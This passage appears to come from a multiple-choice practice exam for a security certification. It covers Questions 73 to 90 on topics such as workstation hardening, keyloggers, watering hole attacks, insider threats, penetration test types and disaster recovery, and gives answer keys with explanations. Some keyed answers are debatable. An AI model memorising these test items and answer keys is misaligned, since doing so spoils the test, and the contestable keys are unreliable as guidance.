To enhance the email server performance and speed
Explanation
Enhancing email server performance and speed is not the primary objective of implementing an email archival solution. The main purpose of an email archival solution is to retain and retrieve email data for compliance, legal, and business continuity purposes.
Overall explanation
4.4 Explain security alerting and monitoring concepts and tools.
The objective of implementing the email archival solution is to ensure that email data may be retained and retrieved for long periods. Organizations can securely store and access their email communications and attachments to meet regulatory and compliance requirements.
Domain
4.0 Security Operations
Question 73Skipped
A sales enterprise is enhancing the security of all its sales operators’ workstations by applying hardening policies. Which of the following methods can they use to minimize the risk of data breaches and unauthorized access?
Blocking all the connections to the workstations
Explanation
Blocking all connections to the workstations may hinder legitimate access to necessary resources and services. While restricting unnecessary connections is important for security, completely blocking all connections can impact productivity and functionality. It is important to implement targeted firewall rules and network segmentation instead of a blanket block on all connections.
Disabling automatic updates
Explanation
Disabling automatic updates can actually increase the risk of data breaches and unauthorized access. Automatic updates are essential for keeping software and operating systems up to date with the latest security patches and fixes. Disabling them can leave workstations vulnerable to known security vulnerabilities.
Allowing employees to download and install security tools
Explanation
Allowing employees to download and install security tools can introduce additional security risks to the workstations. Employees may inadvertently download malicious software disguised as security tools, leading to potential data breaches and unauthorized access.
Correct answer
Strong password policies
Explanation
Strong password policies are an effective method to minimize the risk of data breaches and unauthorized access. By enforcing the use of complex passwords, regularly updating passwords, and implementing multi-factor authentication, the sales enterprise can enhance the security of the workstations and protect sensitive data.
Overall explanation
4.1 Given a scenario, apply common security techniques to computing resources.
The sales enterprise can use strong password policies to minimize the risk of data breaches and unauthorized access. Password policies involve defining the length of the password, its complexity in terms of the inclusion of alphanumeric, and special characters, the password history, and so forth.
Domain
4.0 Security Operations
Question 74Skipped
The security department at an organization has identified a security threat on an endpoint and has suspected the presence of a keylogger. What best defines a keylogger?
Correct answer
Software that captures keystrokes on a device
Explanation
Software that captures keystrokes on a device is the correct definition of a keylogger. Keyloggers are malicious software programs designed to capture and record keystrokes entered by a user on a device, often used for stealing sensitive information such as passwords.
Digital key that can unlock keypad controlled doors
Explanation
A digital key that can unlock keypad controlled doors is not related to keyloggers. Keyloggers are software tools that capture keystrokes on a device, not physical keys used for access control.
A log file of all the encryption keys
Explanation
A log file of all the encryption keys is not a keylogger. Keyloggers are software tools that capture and record keystrokes on a device, not log files of encryption keys.
Hardware to prevent unauthorized access to an endpoint
Explanation
Hardware to prevent unauthorized access to an endpoint is not a keylogger. Keyloggers are software-based tools that capture and record keystrokes on a device, not physical hardware devices.
Overall explanation
2.4 Given a scenario, analyze indicators of malicious activity.
A keylogger is software that captures keystrokes on a device. It is programmed to record the keys that a user types on their device behind the scenes. The logged keystrokes may be stored at a hidden location on the device or shipped off to a remote location for the attacker to come and collect at a later point in time. Sensitive information such as usernames, passwords, credit card numbers, etc., may all be captured by the keylogger and stolen.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 75Skipped
A group of hackers have observed that the employees of an organization they are targeting frequently visit a popular news forum linked to their institution. The hackers advertently compromise the news forum with malicious code. What type of attack have they performed?
Social engineering
Explanation
Social engineering involves manipulating individuals into divulging confidential information or performing actions that compromise security. While social engineering tactics may have been used to gather information about the employees’ habits, the primary attack in this scenario is the compromise of the news forum, making it a watering hole attack rather than a social engineering attack.
Correct answer
Watering hole
Explanation
The hackers have performed a watering hole attack by compromising a trusted website frequented by the organization’s employees. This attack aims to infect the employees’ devices when they visit the compromised site, exploiting their trust in the website to gain unauthorized access to the organization’s network.
Zero-day
Explanation
A zero-day attack involves exploiting a previously unknown vulnerability in software or hardware. In this scenario, the hackers did not exploit a zero-day vulnerability but instead compromised a legitimate website frequented by the organization’s employees, making it a watering hole attack rather than a zero-day attack.
Ransomware
Explanation
Ransomware is a type of malware that encrypts a victim’s files and demands payment for their release. The scenario described does not involve ransomware, as the hackers compromised a news forum with malicious code to target the organization’s employees, not encrypt their files for financial gain.
Overall explanation
2.2 Explain common threat vectors and attack surfaces.
The group of hackers has performed a watering hole attack. The hackers target and infect a website commonly visited by their intended victims to deliver malware. The technique resembles poisoning a watering hole where all the animals in the jungle gather around to drink water, so you may easily capture the animals who drank from the watering hole.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 76Skipped
A global e-commerce enterprise is evaluating its business continuity plans to ensure resilience during a disaster. Which of the following disaster recovery site considerations should they apply?
Proximity to the headquarters
Explanation
Proximity to the headquarters may seem like a logical choice for a disaster recovery site, but it can actually be a risk if the headquarters and the recovery site are in the same geographical area. In the event of a regional disaster, both locations could be affected simultaneously, leading to a complete loss of operations.
Data encryption controls
Explanation
Data encryption controls are important for protecting sensitive information, but they are not directly related to disaster recovery site considerations. While data security is crucial for overall business continuity, other factors such as geographic diversity and redundancy play a more significant role in ensuring resilience during a disaster.
Correct answer
Diverse geographic locations
Explanation
Diverse geographic locations for disaster recovery sites are essential to ensure resilience during a disaster. By having recovery sites in different regions, the enterprise can mitigate the risk of a single point of failure and ensure business continuity even if one location is impacted by a disaster.
Large workspace area
Explanation
While having a large workspace area at a disaster recovery site may be beneficial for accommodating staff during a disaster, it is not a critical consideration for ensuring resilience. The focus should be on the site’s ability to maintain operations and data integrity in the event of a disaster.
Overall explanation
3.4 Explain the importance of resilience and recovery in security architecture.
The global e-commerce enterprise should consider diverse geographic locations for their disaster recovery sites. This reduces the risk of both the primary data center and disaster recovery site being impacted at the same time because of regional disasters. Business continuity is ensured in cases of natural disasters that affect and cover a wide area or regional power outages.
Domain
3.0 Security Architecture
Question 77Skipped
An employee with privileged access to sensitive data has recently expressed not being satisfied with her position at the company and has been observed copying confidential financial data during late hours to a remote location. What type of threat is she?
Phisher
Explanation
A phisher is an individual who attempts to deceive others into providing sensitive information, such as passwords or financial details, through fraudulent means. This choice does not accurately describe the scenario of an employee with privileged access copying confidential data.
Black hat
Explanation
A black hat is a term used to describe a hacker who uses their skills for malicious purposes, such as breaking into computer systems or networks without authorization. While the employee in the scenario is engaging in unauthorized activities, the term "black hat" specifically refers to hackers rather than an insider threat.
Correct answer
Insider threat
Explanation
An insider threat refers to a current or former employee, contractor, or business partner who has access to an organization’s sensitive data and misuses that access for malicious purposes. In this scenario, the employee with privileged access copying confidential financial data fits the profile of an insider threat.
Hacktivist
Explanation
A hacktivist is an individual who hacks computer systems or networks to promote a social or political agenda. The scenario described does not align with the typical motivations of a hacktivist, as the employee is copying confidential financial data for personal gain rather than for activism.
Overall explanation
5.6 Given a scenario, implement security awareness practices.
The employee is an insider threat. The behavior she has been exhibiting raises concerns about the misuse or abuse of the access she is authorized to have. Insider threats refer to individuals within the organization that pose a threat to the resources, data, and security.
Domain
5.0 Security Program Management and Oversight
Question 78Skipped
A penetration tester has been provided with significant information about the client’s network topology, IP addresses, network devices, and configurations. What type of penetration test is being performed?
Gray box
Explanation
A gray box penetration test falls between white box and black box tests. The tester has partial knowledge of the client’s network infrastructure, such as some details about the network topology or configurations. This approach simulates an attack from a semi-informed external or internal threat actor.
Red box
Explanation
Red box testing is not a standard term in the context of penetration testing. It may refer to a specialized type of test or a specific methodology not commonly used in the field of cybersecurity.
Black box
Explanation
A black box penetration test is conducted with no prior knowledge of the client’s network infrastructure. The tester approaches the network as an external attacker would, without any insider information. This type of test helps assess the organization’s security posture from an outsider’s perspective.
Correct answer
White box
Explanation
In a white box penetration test, the tester has full knowledge of the client’s network infrastructure, including IP addresses, network devices, and configurations. This type of test allows the tester to simulate an attack from an insider or a malicious employee with privileged access.
Overall explanation
5.5 Explain types and purposes of audits and assessments.
A white box penetration test is being performed. In such a test, the tester has access to detailed information about the target such as the network architecture, devices and their configurations, user accounts, and passwords. The information is provided before the start of the test and the penetration tester generally has sufficient internal access to the systems to properly assess their security posture,
Domain
5.0 Security Program Management and Oversight
Question 79Skipped
An online marketplace connects its buyers and sellers with its web platform. They want to add a means to strengthen the security behind the user data and the website by initiating alerting activities to support them in proactively detecting and responding to security incidents. Which of the following is essential to support their objective?
Correct answer
Sufficient logging of the website transactions
Explanation
Sufficient logging of website transactions is essential for supporting the objective of proactively detecting and responding to security incidents. By logging all website transactions, the online marketplace can monitor and analyze the data to identify any suspicious activities or security breaches in real-time. This logging can help in alerting activities to support proactive security incident detection and response.
Blocking all users from accessing the website
Explanation
Blocking all users from accessing the website is an extreme measure that would disrupt the normal operations of the online marketplace. It does not support the objective of strengthening security behind user data and the website by initiating alerting activities to proactively detect and respond to security incidents.
Conducting scheduled vulnerability scans
Explanation
Conducting scheduled vulnerability scans is important for identifying potential weaknesses in the system that could be exploited by attackers. While this is a good security practice, it does not directly support the objective of proactively detecting and responding to security incidents in real-time.
Installing antivirus software on the web server
Explanation
Installing antivirus software on the web server is a good security practice to protect against malware and other malicious software. However, it is not directly related to the objective of proactively detecting and responding to security incidents through alerting activities.
Overall explanation
4.4 Explain security alerting and monitoring concepts and tools.
The online marketplace should implement sufficient logging of the website transactions to proactively detect and respond to security incidents. Recording and monitoring all the user interactions on the platform assist in identifying potentially suspicious or malicious activities in real-time.
Domain
4.0 Security Operations
Question 80Skipped
What is a likely consequence that a financial institution may face for non-compliance to data protection and privacy regulations?
Correct answer
The institution may face business and operation sanctions
Explanation
Non-compliance with data protection and privacy regulations can result in business and operation sanctions for a financial institution. This can include fines, penalties, and restrictions on certain business activities, which can have a significant impact on the institution’s financial stability and reputation.
All the employees will go to jail
Explanation
Non-compliance with data protection and privacy regulations does not typically result in all employees going to jail. While individuals responsible for the non-compliance may face legal consequences, such as fines or sanctions, it is unlikely that all employees would be held personally liable to the extent of imprisonment.
The institution shall have to stop all its operations
Explanation
While non-compliance with data protection and privacy regulations can have serious consequences, it is unlikely that a financial institution would be required to stop all of its operations immediately. However, the institution may face legal actions, fines, and other penalties that could impact its ability to operate effectively.
The situation is normal so it is not a major issue
Explanation
Non-compliance with data protection and privacy regulations is not a normal or minor issue. It is a serious violation that can have legal, financial, and reputational consequences for the institution. Ignoring or downplaying the importance of compliance can lead to severe repercussions.
Overall explanation
5.4 Summarize elements of effective security compliance.
The institution may face business and operation sanctions for non-compliance to data protection and privacy regulations. Severe consequences such as regulatory fines and legal penalties may be given for mishandling sensitive data.
Domain
5.0 Security Program Management and Oversight
Question 81Skipped
A software development agency is performing a risk analysis of a new software project in their pipeline and is evaluating the security risks associated with the project. After identifying the risks, they have started prioritizing them. How would a qualitative risk analysis benefit the software development team?
Numerical values are assigned to all the risks
Explanation
Numerical values assigned to risks are typically part of quantitative risk analysis, not qualitative risk analysis. In qualitative risk analysis, risks are assessed based on their impact and likelihood without assigning numerical values.
Correct answer
Risks are prioritized based on their potential likelihood and impact
Explanation
Qualitative risk analysis helps the software development team prioritize risks by considering the potential likelihood and impact of each risk. By focusing on these factors, the team can address the most critical risks first and allocate resources effectively to mitigate them.
Specific vulnerabilities are identified and weighted
Explanation
While specific vulnerabilities may be identified in a risk analysis, weighting them is more commonly associated with quantitative risk analysis rather than qualitative risk analysis. Qualitative risk analysis focuses on prioritizing risks based on their potential impact and likelihood.
Comprehensive risk mitigation plans are developed
Explanation
Developing comprehensive risk mitigation plans is an important step in risk management, but it is not directly related to the benefits of qualitative risk analysis. Qualitative risk analysis helps in prioritizing risks based on their potential impact and likelihood, which can guide the development of effective risk mitigation strategies.
Overall explanation
5.2 Explain elements of the risk management process.
A qualitative risk analysis ensures that risks are prioritized based on their potential likelihood and impact. It involves analyzing risks qualitatively with the aid of qualitative scales to determine which risks should be addressed first. A common tool for qualitative risk analysis is the Probability/Likelihood versus Impact Risk Matrix.
Domain
5.0 Security Program Management and Oversight
Question 82Skipped
A trading agency wants to physically restrict unauthorized access to its data center where all its critical application and database servers reside. Which is the most effective preventive control that they may implement?
Security cameras
Explanation
Security cameras can help monitor activity in the data center, but they are not a direct preventive control for restricting unauthorized access. While they can provide valuable footage for investigation after an incident, they do not actively prevent unauthorized individuals from entering the data center.
Correct answer
Biometrics
Explanation
Biometrics, such as fingerprint or retina scans, provide a highly secure method of authentication that can effectively restrict unauthorized access to the data center. Biometric systems are difficult to bypass or replicate, making them a strong preventive control for physical access security.
Alarms
Explanation
Alarms can alert security personnel to unauthorized access attempts in the data center, but they do not directly prevent access. While alarms can be a valuable component of a security system, they are more reactive in nature and may not be as effective as biometric controls for preventing unauthorized entry.
Motion Sensors
Explanation
Motion sensors can detect movement in the data center, but they may not be the most effective preventive control for restricting unauthorized access. While they can alert security personnel to potential intruders, they do not provide a foolproof method of authentication or access control.
Overall explanation
1.1 Compare and contrast various types of security controls.
The most effective preventive control that the trading agency should implement is biometrics. Biometric authentication such as fingerprint or retina scans greatly reduces the risk of unauthorized personnel physically accessing the data center.
Domain
1.0 General Security Concepts
Question 83Skipped
An organization was recently struck by a cyclone at its primary data center which caused excessive damage due to the flooding. Despite the catastrophic losses, their critical data was able to be recovered. Which practice was most significant in ensuring the successful recovery of the data?
Correct answer
Backups
Explanation
Backups are the most significant practice in ensuring the successful recovery of data in the event of a disaster like a cyclone. Regular backups of critical data to offsite locations or cloud storage ensure that data can be restored in case of data center damage or loss. This practice is essential for data recovery and business continuity.
IDS
Explanation
IDS (Intrusion Detection System) is a security tool that monitors network traffic for suspicious activity or security breaches. While IDS is important for detecting and responding to security incidents, it is not directly related to ensuring the successful recovery of data after a disaster like a cyclone.
IAM
Explanation
IAM (Identity and Access Management) is a security practice that focuses on managing user identities and their access to resources within an organization’s IT infrastructure. While IAM is crucial for controlling access to data and systems, it is not directly related to ensuring the successful recovery of data after a disaster like a cyclone.
RAID
Explanation
RAID (Redundant Array of Independent Disks) is a data storage technology that combines multiple disk drives into a single logical unit to improve performance, fault tolerance, and data redundancy. While RAID can help protect against disk failures and improve data availability, it is not specifically designed for data recovery in the event of a catastrophic event like a cyclone.
Overall explanation
3.4 Explain the importance of resilience and recovery in security architecture.
Backups are most significant in ensuring the successful recovery of the data. Offline backups to external media situated at offsite locations are the best practices for storing the data to be recovered. Offsite backups offer protection to the backup media in case there is physical damage at the primary data center thus ensuring redundant backups.
Domain
3.0 Security Architecture
Question 84Skipped
A disgruntled employee has learned that he will soon be laid off due to the company facing challenging times so has considered downsizing the number of staff. The employee has privileged access to critical network resources. What type of threat is the organization likely to face?
Political
Explanation
A political threat usually involves issues related to government regulations, policies, or actions that may impact the organization’s operations. The situation described in the question is more about an individual employee’s actions rather than political factors.
Correct answer
Internal
Explanation
The organization is likely to face an internal threat in this scenario because the disgruntled employee with privileged access to critical network resources poses a significant risk to the organization’s security. Internal threats are often more challenging to detect and mitigate compared to external threats.
Ethical
Explanation
An ethical threat refers to situations where employees or individuals within the organization act unethically, such as engaging in fraudulent activities or violating company policies. While the disgruntled employee’s actions may be unethical, the primary concern in this scenario is the potential security risk posed by the employee’s privileged access.
External
Explanation
An external threat typically comes from outside the organization, such as hackers or cybercriminals attempting to breach the network security. In this scenario, the threat is originating from within the organization itself, not from an external source.
Overall explanation
2.1 Compare and contrast common threat actors and motivations.
The organization is likely going to face an internal threat. Since the employee is obviously upset after learning that they will be laid off due to a reduction of personnel the intention and motivation exist to harm the company. Moreover, the capability exists as well because the employee has privileged access to critical network resources.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 85Skipped
The IT department of a large business conglomerate oversees managing a critical database containing sensitive business data. What is the responsibility of the data owner of the data stored in the critical database?
Correct answer
Setting access permissions and policies
Explanation
Setting access permissions and policies is a key responsibility of the data owner to ensure that only authorized individuals can access the sensitive business data stored in the critical database. This helps protect the data from unauthorized access and potential breaches.
Implementing technical security measures
Explanation
Implementing technical security measures is typically the responsibility of the IT department or security team, not the data owner. The data owner is more focused on setting access permissions and policies to protect the data.
Monitoring the database for malicious activities
Explanation
Monitoring the database for malicious activities is typically the responsibility of the IT department or security team, not the data owner. The data owner’s responsibility lies more in setting access permissions and policies to prevent unauthorized access.
Ensuring data is backed up regularly
Explanation
Ensuring data is backed up regularly is an important task for data protection, but it is not specifically the responsibility of the data owner. Setting access permissions and policies is more directly related to the data owner’s role in protecting the data.
Overall explanation
5.1 Summarize elements of effective security governance.
Setting access permissions and policies is the responsibility of the data owner. They ensure that the sensitive data and systems are only accessible by authorized individuals. They also make critical decisions regarding how the data is classified, and how it should be used. The data owners hold ultimate responsibility for the security and privacy of the data.
Domain
5.0 Security Program Management and Oversight
Question 86Skipped
An employee working at a government agency has been suspected of leaking classified government information to foreign intelligence agencies, however, no evidence of data transfers or email exchange was found. What technique is possibly being used to leak the data?
Macros
Explanation
Macros are small programs or scripts that can automate tasks in applications like Microsoft Excel or Word. While macros can be used for malicious purposes, such as spreading malware, they are not typically used for hiding or leaking classified information without leaving a trace.
Hashing
Explanation
Hashing is a cryptographic technique used to convert data into a fixed-size string of characters. While hashing is commonly used for data integrity verification and password storage, it is not typically used for leaking classified information. Hashing does not involve hiding or concealing data in a covert manner.
Correct answer
Steganography
Explanation
Steganography is the practice of concealing messages or information within other non-secret data or media. This technique allows individuals to hide sensitive information within seemingly innocent files, such as images or audio files, making it difficult to detect the presence of the hidden data. In this scenario, the suspected employee may be using steganography to hide and leak classified government information without leaving any obvious evidence.
Eidetic memory
Explanation
Eidetic memory, also known as photographic memory, refers to the ability to recall images, sounds, or objects in great detail after only a short exposure. While individuals with eidetic memory may have exceptional recall abilities, this technique is not typically used for leaking classified information to foreign intelligence agencies. It is more focused on memory retention and recall rather than covert information sharing.
Overall explanation
1.4 Explain the importance of using appropriate cryptographic solutions.
The employee at the government agency is possibly using steganography to leak the data. There is suspicion that the employee is leaking information, however, there is no direct evidence. Steganography is the mechanism of hiding or embedding secret data within non-confidential files or messages to conceal the existence of the secret information. It is generally applied to bypass traditional data loss prevention measures.
Domain
1.0 General Security Concepts
Question 87Skipped
Which of the below processes can assist the librarians at a public library in verifying the identities of users who want to access e-books and online resources from their new online digital lending platform?
Implementation of multi-factor authentication for all library services
Explanation
Implementing multi-factor authentication for all library services adds an extra layer of security by requiring users to provide two or more forms of verification before accessing e-books and online resources. While this is a good security practice, it may not specifically assist in verifying the identities of users for the new digital lending platform.
Enabling anonymous library services accessibility
Explanation
Enabling anonymous library services accessibility does not assist in verifying the identities of users accessing e-books and online resources. It may compromise the security and integrity of the digital lending platform by allowing unidentified users to access sensitive materials.
Correct answer
Submission of a copy of a government-issued photo ID
Explanation
Submission of a copy of a government-issued photo ID is a reliable method for verifying the identities of users accessing e-books and online resources. It ensures that the users are who they claim to be and helps prevent unauthorized access to sensitive materials.
Accepting social media profiles for verifications
Explanation
Accepting social media profiles for verifications may not be a secure method for verifying the identities of users accessing e-books and online resources. Social media profiles can be easily faked or compromised, leading to potential security risks for the library’s digital lending platform.
Overall explanation
4.6 Given a scenario, implement and maintain identity and access management.
The submission of a copy of a government-issued photo ID can assist the librarians at a public library in verifying the identities of users. This will help to provide assurance that the individuals accessing the online resources and e-books are genuine library members.
Domain
4.0 Security Operations
Question 88Skipped
What course of action should be taken by the team at a data center who have discovered that one of their critical generators has developed an unprecedented fault and may not function if an outage occurs?
Shutdown the data center till the generator is fixed
Explanation
Shutting down the entire data center until the generator is fixed may not be the most efficient solution, especially if there are critical operations that need to continue running. It is important to isolate the faulty generator and implement contingency plans to ensure continuity of operations.
Correct answer
Isolate the faulty generator
Explanation
Isolating the faulty generator is the correct course of action to prevent it from causing further damage or potentially affecting the entire data center’s operations. By isolating the faulty generator, the team can ensure that the rest of the infrastructure remains operational.
Closely monitor the performance of the faulty generator
Explanation
Closely monitoring the performance of the faulty generator may provide some insights into its current state, but it does not address the immediate risk of a potential outage. It is important to take proactive steps to mitigate the impact of a potential failure.
Immediately purchase a new generator
Explanation
Immediately purchasing a new generator may not be necessary if the fault can be repaired or if there are backup systems in place to handle the load in case of an outage. It is important to assess the situation and consider all available options before making a significant investment in a new generator.
Overall explanation
3.4 Explain the importance of resilience and recovery in security architecture.
The team at the data center should isolate the faulty generator to prevent potential issues from being caused by it. Power redundancy can be achieved by reliance on the remaining generators as in the scenario only one of them has developed the unprecedented fault. Purchasing a new generator is a viable long-term solution, however, it may take time before its successful installation.
Domain
3.0 Security Architecture
Question 89Skipped
A financial services firm that processes many transactions daily is implementing compliance monitoring automation to adhere to strict regulatory compliance requirements. What is the major advantage of the automation?
Correct answer
Enhanced data security
Explanation
Enhanced data security is the major advantage of automation in compliance monitoring. By automating the process, the firm can ensure that all transactions are consistently monitored for compliance with regulatory requirements, reducing the risk of human error and potential security breaches.
Increased transactions speed
Explanation
Increased transaction speed is not the major advantage of automation in compliance monitoring. While automation can improve efficiency and streamline processes, the primary focus of compliance monitoring automation in a financial services firm is to ensure regulatory compliance and data security.
Reduced training costs
Explanation
Reduced training costs are not the major advantage of automation in compliance monitoring. While automation can lead to cost savings in terms of efficiency and resource allocation, the primary goal of compliance monitoring automation in a financial services firm is to ensure adherence to regulatory requirements and enhance data security.
Streamlined vendor management
Explanation
Streamlined vendor management is not the major advantage of automation in compliance monitoring. While automation can help streamline various processes within the organization, the primary focus of compliance monitoring automation in a financial services firm is to ensure regulatory compliance and data security, rather than vendor management.
Overall explanation
5.4 Summarize elements of effective security compliance.
The major advantage of compliance monitoring automation is enhanced data security. The financial services firm aims at adhering to strict regulatory compliance requirements. The automation shall ensure that the practices of handling the data are aligned and conform to the regulatory requirements, in turn reducing the risk of data breaches and non-conformance.
Domain
5.0 Security Program Management and Oversight
Question 90Skipped
The physical security team is concerned about the security of the premises at an organization in the event of an unexpected power outage. What measures can they take to reduce potential security risks during a blackout?
Correct answer
Backup generators and emergency lights
Explanation
Backup generators and emergency lights are essential measures to reduce potential security risks during a blackout. Backup generators can ensure that critical systems, such as security cameras, alarms, and access control systems, remain operational during a power outage. Emergency lights can provide visibility and guidance in the event of a blackout, helping to maintain security and safety on the premises.
Biometric access control
Explanation
Biometric access control systems provide a secure way to manage access to the premises, but they rely on power to function. In the event of a blackout, biometric access control systems may become inaccessible, potentially increasing security risks.
Closed circuit television
Explanation
Closed circuit television (CCTV) can be a useful tool for monitoring and recording activities on the premises, but it may not directly address security risks during a blackout when the cameras may not be operational due to power loss.
Surge protectors
Explanation
Surge protectors are designed to protect electronic devices from power surges and spikes, but they do not provide a solution for maintaining security measures during a blackout. While surge protectors can prevent damage to equipment, they do not address security risks related to power outages.
Overall explanation
1.2 Summarize fundamental security concepts.
The physical security team can resort to backup generators and emergency lights. Illumination in critical areas, when an unexpected power outage occurs, is ensured with emergency lighting that receives its power from a backup generator. Physical security is enhanced because the security personnel may effectively monitor the premises and its surroundings while continuing to perform their regular duties.
Domain
1.0 General Security Concepts
